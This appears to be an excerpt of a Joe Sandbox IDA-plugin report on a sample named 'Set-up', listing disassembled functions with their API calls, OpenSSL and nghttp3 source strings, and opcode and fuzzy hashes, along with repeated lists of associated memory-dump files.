Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$strcpy
String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
API String ID: 2790333442-843477118
Opcode ID: 782ce7c5120c61916bb737cf5157aab9e2c2ffb7e5316669e6c14e81af914ba8
Instruction ID: c4f0757efccd36eea9b779b73d778cb3e4856335b67a76a9ea7679f63cf8c95a
Opcode Fuzzy Hash: 782ce7c5120c61916bb737cf5157aab9e2c2ffb7e5316669e6c14e81af914ba8
Instruction Fuzzy Hash: 3EE13A31D083009BD721EE29D85171EB7E0AF91770F18872FF9D8A7252EB74D945A782

Function 00E6E070 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,00E6C1CE,?,00000003,?), ref: 00E6E4EE

Strings

nghttp3_qpack.c, xrefs: 00E6E4E4
(size_t)(p - buf->last) == len, xrefs: 00E6E4E9

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-1997541155
Opcode ID: a51da67834c4e9022309630b00d5f2d59bc5f511f572be256759a9687528e850
Instruction ID: e70296ae0d3552f6cb0d14b9aa8af75e6fce351c56d175600e8a429548274b81
Opcode Fuzzy Hash: a51da67834c4e9022309630b00d5f2d59bc5f511f572be256759a9687528e850
Instruction Fuzzy Hash: 4EE14A36B442105BD7188E3CD89072AB7D3EBD5350F299A3CE9A9E73D1EA35DC488781

Function 0102E5D0 Relevance: 5.1, APIs: 3, Instructions: 1393COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 0102E5F2
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0102E67F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0103003E

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 99c5e9a911a58d1d573833a82cda9a4d4abf5d5f49c365cb7e29c0b33ac77fda
Instruction ID: 06d69644ea9c26aff2e6c040a127c548449989bb338791fd123a41fea9bef798
Opcode Fuzzy Hash: 99c5e9a911a58d1d573833a82cda9a4d4abf5d5f49c365cb7e29c0b33ac77fda
Instruction Fuzzy Hash: F0D24FAAC39BD541E323A63D64122E6E750AFFB148F51E72BFCD430E56EB21B1844319

Function 0113E940 Relevance: 4.9, Strings: 3, Instructions: 1163COMMON

Download Yara Rule

Strings

4, xrefs: 0113EA6D
`, xrefs: 0113F8D3
`, xrefs: 0113FE82

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: 4$`$`
API String ID: 0-1230936812
Opcode ID: 713c790421ab55f7fa8f290db61bdb421a0d92e28e95331ccc02504bcc27e68a
Instruction ID: aea8ac51bbbfc902c9a55b95542bf812b1dc399790d86a50dd0fe62a4c481fd8
Opcode Fuzzy Hash: 713c790421ab55f7fa8f290db61bdb421a0d92e28e95331ccc02504bcc27e68a
Instruction Fuzzy Hash: 0FB2B072D087928FD719CF18C8806AABBE1FFCA304F158B2DE99597356D730A945CB42

Function 011362D0 Relevance: 4.4, Strings: 3, Instructions: 694COMMON

Download Yara Rule

Strings

, xrefs: 0113692B
, xrefs: 011369F8
, xrefs: 01136AA6

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: $ $
API String ID: 0-3665324030
Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction ID: 53fa276d918d3d51a2286efabd4f689d296655fb48cb492a73fbdbcd7db11692
Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction Fuzzy Hash: BE621675A083919FC328CF29C49066AFBE1BFC8310F158A2EE9D993355D730A945CF92

Function 00EE24A0 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

ossl_qrl_enc_level_set_provide_secret, xrefs: 00EE251A, 00EE259E, 00EE2748, 00EE27E1
ssl/quic/quic_record_shared.c, xrefs: 00EE2524, 00EE25A8, 00EE2752, 00EE27EB
quic hpquic kuossl_qrl_enc_level_set_key_update, xrefs: 00EE2680

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
API String ID: 0-2745174052
Opcode ID: b59dcac7a6e0dcc20b1b8e75b915e31454f209808d53d24fec370c5e1b633c6b
Instruction ID: 0bea8f211a48557ad21e0c17d167e4390a69270fe324a641743e0c71666dc935
Opcode Fuzzy Hash: b59dcac7a6e0dcc20b1b8e75b915e31454f209808d53d24fec370c5e1b633c6b
Instruction Fuzzy Hash: 1ED12B716083899BE7309F52DC42F5BB7D9AF84308F04582DFB8967282E675D804DB67

Function 01130560 Relevance: 3.4, APIs: 2, Instructions: 932COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18319e2b862b268e22b4b52e7e5183b87de3606f273c83eaf8a6c182e7c25a4e
Instruction ID: 4eea5340977fc6a7c2219d49004b92c6da5e210b0dfd9d3e801c03de13fe29c2
Opcode Fuzzy Hash: 18319e2b862b268e22b4b52e7e5183b87de3606f273c83eaf8a6c182e7c25a4e
Instruction Fuzzy Hash: 8182A071A087558FC728CF28C89025EFBE1BBC8714F198A2DE9D897395D770E945CB82

Function 0102E138 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0102E16E

Strings

providers/implementations/kdfs/argon2.c, xrefs: 0102E315, 0102E328

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: providers/implementations/kdfs/argon2.c
API String ID: 3510742995-3406374482
Opcode ID: ff92db4b5c48c886f6691f1744b47acb89969eaf641b48471ef4626a55c8ff20
Instruction ID: 0cd003dfe04a0e51da9b0a5ff28f3d3f5ee5a0ec354ac6a6d2b3303347bbb903
Opcode Fuzzy Hash: ff92db4b5c48c886f6691f1744b47acb89969eaf641b48471ef4626a55c8ff20
Instruction Fuzzy Hash: FE512471D087109BD310EB28D84169AF7E4FF98354F558E2DEACAA7242E331F685CB85

Function 00DD6080 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00DD608E
BCryptGenRandom.BCRYPT(00000000,?,?,00000002), ref: 00DD609C

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: CryptRandommemset
String ID:
API String ID: 642379960-0
Opcode ID: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
Instruction ID: 38e0c6461ebede3eff75a73e6fa094bba5aadace33f4c83662a54d9a885af1a3
Opcode Fuzzy Hash: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
Instruction Fuzzy Hash: 34D05E3630975237D6286199AC16F5F6A9CDFC6B20F08402EB504E22C1D660A80182E5

Function 01114410 Relevance: 2.8, APIs: 2, Instructions: 316COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,?,?,?,?,00000000,?,?,011122FC,?,?), ref: 0111447B
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000001), ref: 01114760

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8defa95b49a5c11e3752a50ceb4429b1ad1a1c6c02dbfbabe4a14801d4d12c5d
Instruction ID: 44404519de79bc6b80f2354c4499174092c5f82477428369abc2051fecbecee6
Opcode Fuzzy Hash: 8defa95b49a5c11e3752a50ceb4429b1ad1a1c6c02dbfbabe4a14801d4d12c5d
Instruction Fuzzy Hash: 1EC18D75604B018FD328CF29C490A2AFBE2FF86714F148A3DE5AA87B95D734E845CB51

Function 00E8E3E0 Relevance: 1.8, Strings: 1, Instructions: 550COMMON

Download Yara Rule

Strings

\, xrefs: 00E8E5BC

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: c161bd782a1ff8571c9fbb9425bd265b8a132dfbcf0c38b2ec1468bdc8ae7ad4
Instruction ID: 016ba2f347ebfb04b49910996a90234f84d84f2b730d94ebc41852368fc96ce5
Opcode Fuzzy Hash: c161bd782a1ff8571c9fbb9425bd265b8a132dfbcf0c38b2ec1468bdc8ae7ad4
Instruction Fuzzy Hash: 7602B6669083156BE720BA20DC42B2F77D89F90748F086439FD9DB6343F625ED1897A3

Function 00FAA780 Relevance: 1.6, APIs: 1, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b747d86157e915ba1c75205814a78b1ca71f2dcb168b0d02f440f493ee4b3f0d
Instruction ID: 474999dcdf14520c6875d1cff11b333129c2ae891680abbe5ed8b5c3fa28ef81
Opcode Fuzzy Hash: b747d86157e915ba1c75205814a78b1ca71f2dcb168b0d02f440f493ee4b3f0d
Instruction Fuzzy Hash: 69D1F4719087818FC725CF28C48066AFBF1FF8A314F098A5DE8DA97252D734E949DB52

Function 00E90420 Relevance: 1.5, APIs: 1, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
Instruction ID: 457dfaa0cbdb84752944ffa4cc5897fbca2c984616fe28ef856d9c840ab997cb
Opcode Fuzzy Hash: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
Instruction Fuzzy Hash: A5A127716083118FCB24CF2CC48062EB7E6AFC5314F9A962DE5A5EB392E734DC458B81

Function 00E900E0 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

H, xrefs: 00E90196

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
